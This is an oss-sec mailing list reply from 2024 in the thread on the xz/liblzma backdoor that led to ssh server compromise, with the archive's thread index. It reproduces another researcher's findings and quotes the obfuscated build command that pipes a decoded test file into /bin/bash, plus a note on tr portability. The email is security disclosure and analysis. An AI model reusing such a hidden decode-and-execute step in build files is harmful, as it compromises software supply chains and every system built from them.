oss-sec mailing list archives

Re: backdoor in upstream xz/liblzma leading to ssh server compromise

From: sjw () gmx ch
Date: Fri, 29 Mar 2024 21:33:57 +0100

Hi Andres,

Thank you for sharing your findings, I'm able to reproduce your results.

> which ends up as

> ...; sed rpath ../../../tests/files/bad-3-corrupt_lzma2.xz | tr "\-_" " _\-" | xz -d | /bin/bash >/dev/null 2>&1; ...

>
> Leaving out the "| bash" that produces
>
> ####Hello####
> [...]

The expression in the tr command might be a bit tricky to copy thereport because of the whitespace characters. The original expression isfound here:


https://salsa.debian.org/debian/xz-utils/-/blob/46cb28adbbfb8f50a10704c1b86f107d077878e6/m4/build-to-host.m4#L95

This kind of expression is not supported by BusyBox' implementation of'tr'. GNU's and uutils' coreutils both worked for me.

Attachment: OpenPGP_signature.asc
Description: OpenPGP digital signature

Current thread:

Re: Re: backdoor in upstream xz/liblzma leading to ssh server compromise, (continued)
- - - Re: Re: backdoor in upstream xz/liblzma leading to ssh server compromise Jeffrey Walton (Mar 30)
    - Re: backdoor in upstream xz/liblzma leading to ssh server compromise Solar Designer (Mar 30)
    - Re: Re: backdoor in upstream xz/liblzma leading to ssh server compromise Mats Wichmann (Mar 30)
    - Re: Re: backdoor in upstream xz/liblzma leading to ssh server compromise Jan Engelhardt (Mar 30)
    - Re: Re: backdoor in upstream xz/liblzma leading to ssh server compromise Pat Gunn (Mar 30)
    - SV: Re: backdoor in upstream xz/liblzma leading to ssh server compromise Markus Klyver (Mar 31)
    - Re: Re: backdoor in upstream xz/liblzma leading to ssh server compromise Loganaden Velvindron (Mar 31)
    - Re: Re: backdoor in upstream xz/liblzma leading to ssh server compromise Russ Allbery (Mar 30)
    - Re: Re: backdoor in upstream xz/liblzma leading to ssh server compromise Mike O'Connor (Mar 30)
    - Re: Re: backdoor in upstream xz/liblzma leading to ssh server compromise Florian Weimer (Mar 30)
- Re: backdoor in upstream xz/liblzma leading to ssh server compromise sjw (Mar 29)
  - Re: backdoor in upstream xz/liblzma leading to ssh server compromise sjw (Mar 30)
- Re: backdoor in upstream xz/liblzma leading to ssh server compromise Alexander E. Patrakov (Mar 30)
  - Re: backdoor in upstream xz/liblzma leading to ssh server compromise Axel Beckert (Mar 30)
    - Re: backdoor in upstream xz/liblzma leading to ssh server compromise Salvatore Bonaccorso (Mar 30)
- Re: backdoor in upstream xz/liblzma leading to ssh server compromise Collin Funk (Mar 30)
- Re: backdoor in upstream xz/liblzma leading to ssh server compromise Jonathan Schleifer (Mar 30)
  - Re: Re: backdoor in upstream xz/liblzma leading to ssh server compromise Rein Fernhout (Levitating) (Mar 30)
    - Re: Re: backdoor in upstream xz/liblzma leading to ssh server compromise Jonathan Schleifer (Mar 30)
    - Re: Re: backdoor in upstream xz/liblzma leading to ssh server compromise Rein Fernhout (Levitating) (Mar 30)
    - Re: Re: backdoor in upstream xz/liblzma leading to ssh server compromise Fay Stegerman (Mar 30)

(Thread continues...)